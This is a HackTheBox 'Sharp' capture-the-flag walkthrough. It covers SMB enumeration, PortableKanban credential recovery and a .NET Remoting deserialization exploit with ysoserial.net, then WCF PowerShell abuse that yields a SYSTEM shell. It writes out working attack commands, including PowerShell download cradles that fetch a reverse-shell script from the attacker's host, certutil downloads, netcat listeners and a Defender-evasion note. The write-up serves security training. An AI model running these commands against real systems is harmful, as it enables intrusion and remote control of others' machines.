HackTheBox Sharp walkthrough
Methodology
1- Scanning
2- SMB Enumeration
3- Kanban Analysis
4- Config Manipulation
5- Exploit Remote Service
6- WCF Exploitation
Scanning
┌──(m19o@pwning)-[~/m19o/HTB/sharp]
└─# nmap -sV -v -p- --min-rate=10000 10.10.10.219
PORT STATE SERVICE VERSION
135/tcp open tcpwrapped
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
445/tcp open microsoft-ds?
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
8888/tcp open sun-answerbook?
8889/tcp open ddi-tcp-2?
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
SMB Enumeration
Whenever SMB (139/445) is exposed on a Windows host it should be enumerated first: guest or null-session access to shares often leaks files.
Let's start by listing the shares without credentials.
┌──(m19o@pwning)-[~/m19o/HTB/sharp]
└─# smbmap -H 10.10.10.219
[+] IP: 10.10.10.219:445 Name: localhost
Disk Permissions Comment
---- ----------- -------
ADMIN$ NO ACCESS Remote Admin
C$ NO ACCESS Default share
dev NO ACCESS
IPC$ NO ACCESS Remote IPC
kanban READ ONLY
Only the kanban share is readable anonymously, so let's list its contents recursively to see what we can get.
┌──(m19o@pwning)-[~/m19o/HTB/sharp]
└─# smbmap -H 10.10.10.219 -R
[+] IP: 10.10.10.219:445 Name: localhost
Disk Permissions Comment
---- ----------- -------
ADMIN$ NO ACCESS Remote Admin
C$ NO ACCESS Default share
dev NO ACCESS
IPC$ NO ACCESS Remote IPC
kanban READ ONLY
.\kanban\*
dr--r--r-- 0 Sat Nov 14 13:57:04 2020 .
dr--r--r-- 0 Sat Nov 14 13:57:04 2020 ..
fr--r--r-- 58368 Sat Nov 14 13:57:04 2020 CommandLine.dll
fr--r--r-- 141312 Sat Nov 14 13:57:04 2020 CsvHelper.dll
fr--r--r-- 456704 Sat Nov 14 13:57:04 2020 DotNetZip.dll
dr--r--r-- 0 Sat Nov 14 13:57:59 2020 Files
fr--r--r-- 23040 Sat Nov 14 13:57:04 2020 Itenso.Rtf.Converter.Html.dll
fr--r--r-- 75776 Sat Nov 14 13:57:04 2020 Itenso.Rtf.Interpreter.dll
fr--r--r-- 32768 Sat Nov 14 13:57:04 2020 Itenso.Rtf.Parser.dll
fr--r--r-- 19968 Sat Nov 14 13:57:04 2020 Itenso.Sys.dll
fr--r--r-- 376832 Sat Nov 14 13:57:04 2020 MsgReader.dll
fr--r--r-- 133296 Sat Nov 14 13:57:04 2020 Ookii.Dialogs.dll
fr--r--r-- 2558011 Sat Nov 14 13:57:04 2020 pkb.zip
dr--r--r-- 0 Sat Nov 14 13:57:04 2020 Plugins
fr--r--r-- 5819 Sat Nov 14 13:57:04 2020 PortableKanban.cfg
fr--r--r-- 118184 Sat Nov 14 13:57:04 2020 PortableKanban.Data.dll
fr--r--r-- 1878440 Sat Nov 14 13:57:04 2020 PortableKanban.exe
fr--r--r-- 31144 Sat Nov 14 13:57:04 2020 PortableKanban.Extensions.dll
fr--r--r-- 2080 Sat Nov 14 13:57:04 2020 PortableKanban.pk3
fr--r--r-- 2080 Sat Nov 14 13:57:04 2020 PortableKanban.pk3.bak
fr--r--r-- 34 Sat Nov 14 13:57:04 2020 PortableKanban.pk3.md5
fr--r--r-- 413184 Sat Nov 14 13:57:04 2020 ServiceStack.Common.dll
fr--r--r-- 137216 Sat Nov 14 13:57:04 2020 ServiceStack.Interfaces.dll
fr--r--r-- 292352 Sat Nov 14 13:57:04 2020 ServiceStack.Redis.dll
fr--r--r-- 411648 Sat Nov 14 13:57:04 2020 ServiceStack.Text.dll
fr--r--r-- 1050092 Sat Nov 14 13:57:04 2020 User Guide.pdf
.\kanban\Plugins\*
dr--r--r-- 0 Sat Nov 14 13:57:04 2020 .
dr--r--r-- 0 Sat Nov 14 13:57:04 2020 ..
Next, pull the whole share down to our machine so the files can be analysed offline for anything useful.
smbget -R smb://10.10.10.219/kanban
Kanban Analysis
After downloading the contents of the kanban share, I used ack to search the files for the string "password" (case-insensitive).
apt-get install ack
┌──(m19o@pwning)-[~/m19o/HTB/sharp]
└─# ack -i "password"
PortableKanban.pk3
1:{"Columns":[{"Id":"4757781032fd41b2a4511822e2c08850","SortOrder":0,"Name":"Demo","Limit":0,"TaskOrder":{"SortType":"None","Parameters":[{"Field":"Completed","SortOrder":"Descending"},{"Field":"Deadline","SortOrder":"Ascending"},{"Field":"Priority","SortOrder":"Descending"},{"Field":"Topic","SortOrder":"Ascending"},{"Field":"Person","SortOrder":"Ascending"}]},"AutoComplete":false,"ResetCompleted":false,"TimeStamp":637409769443121006}],"Tasks":[{"Id":"33870d6dfe4146718ba0b2c9f7bc05cf","SeriesId":"00000000000000000000000000000000","SortOrder":"oGdBKcFw","ColumnId":"4757781032fd41b2a4511822e2c08850","TopicId":"00000000000000000000000000000000","PersonId":"00000000000000000000000000000000","Text":"New Task","Priority":"Low","Created":"\/Date(1605380100000+0100)\/","CreatedBy":"e8e29158d70d44b1a1ba4949d52790a0","Modified":"\/Date(-62135596800000)\/","ModifiedBy":"00000000000000000000000000000000","Deadline":"\/Date(1605308400000+0100)\/","HasDeadline":false,"Completed":"\/Date(1605308400000+0100)\/","CompletedBy":"00000000000000000000000000000000","Done":false,"Canceled":false,"Link":"","Subtasks":[],"Tags":[],"Estimate":0,"Progress":0,"Points":0,"Comments":[],"CustomFields":{},"TimeStamp":637409769542424146}],"TimeTracks":[],"Persons":[],"Topics":[],"Tags":[],"Views":[],"Users":[{"Id":"e8e29158d70d44b1a1ba4949d52790a0","Name":"Administrator","Initials":"","Email":"","EncryptedPassword":"k+iUoOvQYG98PuhhRC7/rg==","Role":"Admin","Inactive":false,"TimeStamp":637409769245503731},{"Id":"0628ae1de5234b81ae65c246dd2b4a21","Name":"lars","Initials":"","Email":"","EncryptedPassword":"Ua3LyPFM175GN8D3+tqwLA==","Role":"User","Inactive":false,"TimeStamp":637409769265925613}],"ServiceMessages":[],"CustomFieldDescriptors":[],"MetaData":{"Id":"ffffffffffffffffffffffffffffffff","SchemaVersion":"4.2.0.0","SchemaVersionModified":"\/Date(1605380100000+0100)\/","SchemaVersionModifiedBy":"e8e29158d70d44b1a1ba4949d52790a0","SchemaVersionChecked":"\/Date(-62135596800000-0000)\/","SchemaVersionCheckedBy":"00000000000000000000000000000000","TimeStamp":637409769001918463}}
ack found two user records in PortableKanban.pk3. Each carries a base64-encoded EncryptedPassword field (16 bytes once decoded), so the application stores passwords encrypted rather than hashed, which means they are recoverable if the application itself can be persuaded to decrypt and display them.
Administrator
ID: e8e29158d70d44b1a1ba4949d52790a0
EncryptedPassword: k+iUoOvQYG98PuhhRC7/rg==
lars
ID: 0628ae1de5234b81ae65c246dd2b4a21
EncryptedPassword: Ua3LyPFM175GN8D3+tqwLA==
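A plain grep for "password" works here, but on a share with dozens of files it is easier to let a script walk the loot, parse anything that is JSON and report every credential-looking key together with the account it belongs to. The following is an added example written for this walkthrough, not code from the original post or from PortableKanban. The sample .pk3 content it writes is a trimmed copy of the Users block shown above; the key-name regex and the value classification are the author's own heuristics.

```python
import base64
import json
import re
from pathlib import Path

# Constructed sample: the Users block from PortableKanban.pk3 as shown above,
# with the unrelated Columns/Tasks sections trimmed. Values are taken from the
# walkthrough; the demo below writes this to a temporary directory.
SAMPLE_PK3 = json.dumps({
    "Columns": [],
    "Tasks": [],
    "Users": [
        {"Id": "e8e29158d70d44b1a1ba4949d52790a0", "Name": "Administrator",
         "EncryptedPassword": "k+iUoOvQYG98PuhhRC7/rg==", "Role": "Admin"},
        {"Id": "0628ae1de5234b81ae65c246dd2b4a21", "Name": "lars",
         "EncryptedPassword": "Ua3LyPFM175GN8D3+tqwLA==", "Role": "User"},
    ],
    "MetaData": {"SchemaVersion": "4.2.0.0"},
})

# Key names that usually carry credential material. Case-insensitive so that
# "EncryptedPassword", "passwd" and "API_KEY" all match. (Assumed heuristic.)
SECRET_KEY = re.compile(r"pass(word|wd)?|secret|token|api[_-]?key|credential", re.I)


def classify_value(value):
    """Say what a credential-looking value probably is, without decrypting it."""
    if not isinstance(value, str) or value == "":
        return "empty"
    try:
        raw = base64.b64decode(value, validate=True)
    except ValueError:
        return "not-base64 (possibly plaintext)"
    n = len(raw)
    if n % 8 == 0:
        # Padded block-cipher output is always a whole number of 8- or 16-byte
        # blocks; a 15-character password fits in exactly 16 bytes with padding.
        return f"base64, {n} bytes: consistent with padded block-cipher ciphertext"
    return f"base64, {n} bytes"


def find_secrets(obj, path="", context=None):
    """Recursively walk parsed JSON and yield one finding per secret-looking key.

    `context` is the nearest enclosing object's Name, so a password can be tied
    to the account it belongs to.
    """
    if isinstance(obj, dict):
        ctx = obj.get("Name", context)
        for key, val in obj.items():
            sub = f"{path}.{key}" if path else key
            if isinstance(val, (dict, list)):
                yield from find_secrets(val, sub, ctx)
            elif SECRET_KEY.search(key):
                yield {"path": sub, "name": ctx, "key": key,
                       "value": val, "kind": classify_value(val)}
    elif isinstance(obj, list):
        for i, item in enumerate(obj):
            yield from find_secrets(item, f"{path}[{i}]", context)


def triage_directory(root):
    """Scan every file under `root` that parses as JSON and collect secret findings."""
    findings = []
    for file in sorted(Path(root).rglob("*")):
        if not file.is_file():
            continue
        try:
            data = json.loads(file.read_text(encoding="utf-8"))
        except (UnicodeDecodeError, ValueError):
            continue  # DLLs, PDFs, zip files: not JSON, skip them
        for finding in find_secrets(data):
            finding["file"] = file.name
            findings.append(finding)
    return findings


if __name__ == "__main__":
    import tempfile
    with tempfile.TemporaryDirectory() as loot:
        (Path(loot) / "PortableKanban.pk3").write_text(SAMPLE_PK3, encoding="utf-8")
        (Path(loot) / "CommandLine.dll").write_bytes(b"MZ\x90\x00")  # constructed non-JSON file
        for f in triage_directory(loot):
            print(f"{f['file']}: {f['name']} {f['key']}={f['value']!r} [{f['kind']}]")
```

Point it at the directory smbget created and it reports both accounts with their ciphertext and a note that 16 bytes is what a short password looks like after padding and a block cipher, which is the hint that the values are decryptable rather than crackable.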
I read the PortableKanban user guide (User Guide.pdf from the share) to understand how the program handles accounts:
Page 1: The program is portable, so its configuration files can be edited by hand, at the user's own risk.
Page 3: A password may be blank, although the guide advises against it.
Page 11: Administrator is the default account and its password is blank by default.
Page 18: If you forget the password, copy the executable to another directory and run it as admin.
Page 22: User passwords are managed in the Setup/Users tab.
Following page 18, the next step is to run the executable from a different directory to reset the stored passwords.
From here on a Windows machine is needed, since PortableKanban is a Windows desktop application; I dual-boot, so I continued on my Windows install.
When I ran it as admin it reported that the files had been successfully recovered.
I then tried to sign in as Administrator, since it is the default account and the only one we know at this point.
Config Manipulation
The login failed. Since this is portable software, let's take a look at its configuration (PortableKanban.cfg came down with the share).
When the application loads it reads the Administrator's encrypted password from that configuration.
As noted from the guide, a blank password is allowed, so let's remove the stored password value and try to log in again.
BAM! We are logged in.
Now open the Setup/Users tab to view the stored passwords.
Uncheck the "hide password" box to reveal them in clear text.
This gives us lars:G123HHrth234gRG
┌──(m19o@pwning)-[~/m19o/HTB/sharp]
└─# smbmap -u lars -p G123HHrth234gRG -H 10.10.10.219
[+] IP: 10.10.10.219:445 Name: localhost
Disk Permissions Comment
---- ----------- -------
ADMIN$ NO ACCESS Remote Admin
C$ NO ACCESS Default share
dev READ ONLY
IPC$ READ ONLY Remote IPC
kanban NO ACCESS
With lars's credentials we can now read two other shares, dev and IPC$ (and lose access to kanban). Let's list their contents recursively.
┌──(m19o@pwning)-[~/m19o/HTB/sharp]
└─# smbmap -u lars -p G123HHrth234gRG -H 10.10.10.219 -R
[+] IP: 10.10.10.219:445 Name: localhost
Disk Permissions Comment
---- ----------- -------
ADMIN$ NO ACCESS Remote Admin
C$ NO ACCESS Default share
dev READ ONLY
.\dev\*
dr--r--r-- 0 Sun Nov 15 06:30:13 2020 .
dr--r--r-- 0 Sun Nov 15 06:30:13 2020 ..
fr--r--r-- 5632 Sun Nov 15 05:25:01 2020 Client.exe
fr--r--r-- 70 Sun Nov 15 08:59:02 2020 notes.txt
fr--r--r-- 4096 Sun Nov 15 05:25:01 2020 RemotingLibrary.dll
fr--r--r-- 6144 Mon Nov 16 06:55:44 2020 Server.exe
IPC$ READ ONLY Remote IPC
.\IPC$\*
fr--r--r-- 3 Sun Dec 31 19:03:58 1600 InitShutdown
fr--r--r-- 4 Sun Dec 31 19:03:58 1600 lsass
fr--r--r-- 3 Sun Dec 31 19:03:58 1600 ntsvcs
fr--r--r-- 3 Sun Dec 31 19:03:58 1600 scerpc
fr--r--r-- 1 Sun Dec 31 19:03:58 1600 Winsock2\CatalogChangeListener-364-0
fr--r--r-- 3 Sun Dec 31 19:03:58 1600 epmapper
fr--r--r-- 1 Sun Dec 31 19:03:58 1600 Winsock2\CatalogChangeListener-1e4-0
fr--r--r-- 3 Sun Dec 31 19:03:58 1600 LSM_API_service
fr--r--r-- 3 Sun Dec 31 19:03:58 1600 eventlog
fr--r--r-- 1 Sun Dec 31 19:03:58 1600 Winsock2\CatalogChangeListener-190-0
fr--r--r-- 3 Sun Dec 31 19:03:58 1600 atsvc
fr--r--r-- 4 Sun Dec 31 19:03:58 1600 wkssvc
fr--r--r-- 1 Sun Dec 31 19:03:58 1600 Winsock2\CatalogChangeListener-428-0
fr--r--r-- 3 Sun Dec 31 19:03:58 1600 W32TIME_ALT
fr--r--r-- 4 Sun Dec 31 19:03:58 1600 srvsvc
fr--r--r-- 1 Sun Dec 31 19:03:58 1600 vgauth-service
fr--r--r-- 1 Sun Dec 31 19:03:58 1600 Winsock2\CatalogChangeListener-254-0
fr--r--r-- 1 Sun Dec 31 19:03:58 1600 Winsock2\CatalogChangeListener-274-0
fr--r--r-- 1 Sun Dec 31 19:03:58 1600 PIPE_EVENTROOT\CIMV2SCM EVENT PROVIDER
fr--r--r-- 1 Sun Dec 31 19:03:58 1600 PSHost.132546763363573536.2940.DefaultAppDomain.wsmprovhost
kanban NO ACCESS
The IPC$ entries are named pipes rather than files; the interesting share is dev, which holds a client, a server and a shared library. Let's download it.
smbget -R smb://10.10.10.219/dev/ -U lars%G123HHrth234gRG
Exploit Remote Service
We now have two executables and a DLL, so let's decompile them to see how the client and server talk to each other.
I used dnSpy: https://github.com/dnSpy/dnSpy
Opening Client.exe, the RemoteSample class stands out; let's see what it contains.
It connects to the service on port 8888 (one of the two ports nmap could not identify) and carries hard-coded credentials for that service.
User
Port 8888 is a .NET Remoting endpoint, so I searched for a .NET Remoting exploit and found ExploitRemotingService: https://github.com/tyranid/ExploitRemotingService
Creating the reverse shell on Windows
1- Install Python for Windows to run a simple HTTP server that hosts the reverse shell script
2- Download a compiled nc.exe to catch the reverse shell connection
3- Take nishang's Invoke-PowerShellTcp.ps1 and append this line at the end of the file, so the function runs as soon as the script is downloaded and executed: Invoke-PowerShellTcp -Reverse -IPAddress [Your IP] -Port [Your listener port]
4- Use ysoserial.net to build the serialized payload. The embedded command is only a small PowerShell download cradle; the shell script itself is fetched over HTTP at run time (the author reports this staged approach was needed to get past Windows Defender)
ysoserial.exe -f BinaryFormatter -o base64 -g TypeConfuseDelegate -c "powershell -c IEX(new-object net.webclient).downloadstring('http://10.10.x.x/Invoke-PowerShellTcp.ps1')"
ysoserial prints the serialized payload as a single base64 string (omitted here).
Now feed the serialized payload to ExploitRemotingService, authenticating with the credentials recovered from Client.exe:
ExploitRemotingService.exe -s --user=debug --pass="SharpApplicationDebugUserPassword123!" tcp://10.10.10.219:8888/SecretSharpDebugApplicationEndpoint raw <base64 payload>
The tool will report an error; ignore it and check the netcat listener.
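The blob ysoserial produces is a BinaryFormatter stream (MS-NRBF), and the same bytes are what a defender would see in a packet capture of port 8888 or in a staging directory. As an added example for this walkthrough (not code from the original post, from ysoserial or from ExploitRemotingService), here is a small triage script that decodes such a base64 blob, checks the NRBF serialization header and pulls the assembly names out of BinaryLibrary records. The record layout follows the MS-NRBF specification; the sample stream the demo builds is constructed for testing the parser and is not a gadget chain, and the library-name scan is a heuristic rather than a full parser.

```python
import base64
import struct

# SerializationHeaderRecord: RecordType(1) + RootId(4) + HeaderId(4) + MajorVersion(4) + MinorVersion(4)
HEADER_LEN = 17
REC_HEADER, REC_LIBRARY, REC_END = 0x00, 0x0C, 0x0B


def encode_7bit(n):
    """7-bit variable-length integer used by NRBF LengthPrefixedString."""
    out = bytearray()
    while True:
        b = n & 0x7F
        n >>= 7
        if n:
            out.append(b | 0x80)
        else:
            out.append(b)
            return bytes(out)


def decode_7bit(buf, pos):
    """Inverse of encode_7bit; returns (value, next_pos) or (None, pos) if malformed."""
    value, shift = 0, 0
    while pos < len(buf) and shift <= 28:
        b = buf[pos]
        pos += 1
        value |= (b & 0x7F) << shift
        if not b & 0x80:
            return value, pos
        shift += 7
    return None, pos


def build_sample_stream(libraries):
    """Constructed NRBF stream: header, one BinaryLibrary record per name, MessageEnd.
    A skeleton for exercising the parser, not a real serialized object graph."""
    out = bytearray(struct.pack("<Biiii", REC_HEADER, 1, -1, 1, 0))
    for lib_id, name in enumerate(libraries, start=2):
        raw = name.encode("utf-8")
        out += struct.pack("<Bi", REC_LIBRARY, lib_id) + encode_7bit(len(raw)) + raw
    out.append(REC_END)
    return bytes(out)


def is_nrbf(blob):
    """True if blob begins with a SerializationHeaderRecord for format version 1.0."""
    if len(blob) < HEADER_LEN or blob[0] != REC_HEADER:
        return False
    _root, _hdr, major, minor = struct.unpack_from("<iiii", blob, 1)
    return major == 1 and minor == 0


def library_names(blob):
    """Heuristic scan for BinaryLibrary records (0x0C + int32 id + LengthPrefixedString).

    A complete NRBF parser has to understand every record type to walk the stream
    exactly; for triage it is enough to find the marker followed by a positive
    library id and a printable UTF-8 string that fits inside the buffer.
    """
    names, pos = [], HEADER_LEN
    while pos < len(blob):
        if blob[pos] == REC_LIBRARY and pos + 5 < len(blob):
            lib_id = struct.unpack_from("<i", blob, pos + 1)[0]
            length, start = decode_7bit(blob, pos + 5)
            if lib_id > 0 and length and start + length <= len(blob):
                text = blob[start:start + length].decode("utf-8", errors="replace")
                if text.isprintable() and "\ufffd" not in text:
                    names.append(text)
                    pos = start + length
                    continue
        pos += 1
    return names


def triage_blob(b64):
    """Decode a base64 blob (ysoserial output, a captured request body) and summarise it."""
    raw = base64.b64decode(b64)
    nrbf = is_nrbf(raw)
    return {"size": len(raw), "nrbf": nrbf, "libraries": library_names(raw) if nrbf else []}


if __name__ == "__main__":
    # Constructed assembly names for the demo; a real gadget chain references whatever
    # assemblies its types live in.
    sample = base64.b64encode(build_sample_stream([
        "System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",
        "System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",
    ])).decode()
    print(triage_blob(sample))
```

Run triage_blob on the base64 string ysoserial printed and it will confirm the stream is NRBF and list the assemblies the gadget chain pulls in; the same check on traffic to the remoting port is a cheap way to spot BinaryFormatter payloads that have no business arriving from outside.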
D:\SEALED\Sharp>nc.exe -lvp 9001
listening on [any] 4321 ...
Windows PowerShell running as user lars on SHARP
Copyright (C) 2015 Microsoft Corporation. All rights reserved.
PS C:\Windows\system32>whoami
sharp\lars
PS C:\Windows\system32> net user
User accounts for \\SHARP
-------------------------------------------------------------------------------
Administrator debug DefaultAccount
Guest lars WDAGUtilityAccount
The command completed successfully.
The user flag is on lars's desktop:
PS C:\users\lars\desktop> dir
Directory: C:\users\lars\desktop
Mode LastWriteTime Length Name
---- ------------- ------ ----
-ar--- 1/7/2021 2:17 PM 34 user.txt
PS C:\users\lars\desktop> type user.txt
q5e84wq8e4qw8f4dw8f4sdf
After a good deal of enumeration I found a directory called wcf under lars's Documents: a Visual Studio solution for a WCF (Windows Communication Foundation) service, together with its client and a shared library.
PS C:\users\lars\documents\wcf> dir
Directory: C:\users\lars\documents\wcf
Mode LastWriteTime Length Name
---- ------------- ------ ----
d----- 11/15/2020 1:40 PM .vs
d----- 11/15/2020 1:40 PM Client
d----- 11/15/2020 1:40 PM packages
d----- 11/15/2020 1:40 PM RemotingLibrary
d----- 11/15/2020 1:41 PM Server
-a---- 11/15/2020 12:47 PM 2095 wcf.sln
I compressed the solution and moved the archive into C:\dev (the directory backing the dev share) so I could fetch it over SMB.
PS C:\users\lars\documents> dir
Directory: C:\users\lars\documents
Mode LastWriteTime Length Name
---- ------------- ------ ----
d----- 11/15/2020 1:40 PM wcf
PS C:\users\lars\documents> Compress-Archive -LiteralPath C:\users\lars\Documents\wcf -DestinationPath C:\users\lars\Documents\wcf.zip
PS C:\users\lars\documents> dir
Directory: C:\users\lars\documents
Mode LastWriteTime Length Name
---- ------------- ------ ----
d----- 11/15/2020 1:40 PM wcf
-a---- 1/9/2021 6:09 PM 11598452 wcf.zip
Moving the compressed file
move-item -path C:\users\lars\Documents\wcf.zip -destination c:\dev
Mounting the dev share on the attacking Windows machine
C:\Users\Administrator>net use X: \\10.10.10.219\dev
Exploiting WCF
The solution includes a compiled executable, so let's decompile it with dnSpy as before.
Let's look at what Main contains.
It connects to port 8889, the other port nmap could not identify. The WCF server behind it is installed as a service on the box, so whatever it executes should run with that service account's privileges.
The service exposes an InvokePowerShell operation, so we edit the client to call it with our download cradle instead of the original argument:
Console.WriteLine(wcfService.InvokePowerShell("iex (new-object net.webclient).downloadstring('http://10.10.x.x/Invoke-PowerShellTcp.ps1')"));
Now transfer the rebuilt client executable and its library to the victim machine (here with certutil, from our HTTP server) so they can be run as lars:
PS C:\users\lars\documents> certutil -urlcache -split -f "http://10.10.xx.x/WcfRemotingLibrary.dll" WcfRemotingLibrary.dll
**** Online ****
0000 ...
1e00
CertUtil: -URLCache command completed successfully.
PS C:\users\lars\documents> certutil -urlcache -split -f "http://10.10.xx.x/WcfClient.exe" WcfClient.exe
**** Online ****
0000 ...
1400
CertUtil: -URLCache command completed successfully.
PS C:\users\lars\documents> dir
Directory: C:\users\lars\documents
Mode LastWriteTime Length Name
---- ------------- ------ ----
d----- 11/15/2020 1:40 PM wcf
-a---- 1/9/2021 6:51 PM 5120 WcfClient.exe
-a---- 1/9/2021 6:50 PM 7680 WcfRemotingLibrary.dll
Root
Execute WcfClient.exe to trigger the reverse shell
PS C:\users\lars\documents> .\WcfClient.exe
Check the netcat listener:
D:\SEALED\Sharp>nc.exe -lvp 4322
listening on [any] 4322 ...
connect to [10.10.xx.xx] from DESKTOP-9LSPC40 [10.10.10.219] 49692
Windows PowerShell running as user SHARP$ on SHARP
Copyright (C) 2015 Microsoft Corporation. All rights reserved.
PS C:\Windows\system32>whoami
nt authority\system
PS C:\Windows\system32> cd /users/administrator/desktop
PS C:\users\administrator\desktop> dir
Directory: C:\users\administrator\desktop
Mode LastWriteTime Length Name
---- ------------- ------ ----
-ar--- 1/7/2021 2:17 PM 34 root.txt
PS C:\users\administrator\desktop> cat root.txt
asda4as49d5as9d59as2d9as2dasds
Thanks for reading, I hope you enjoyed it.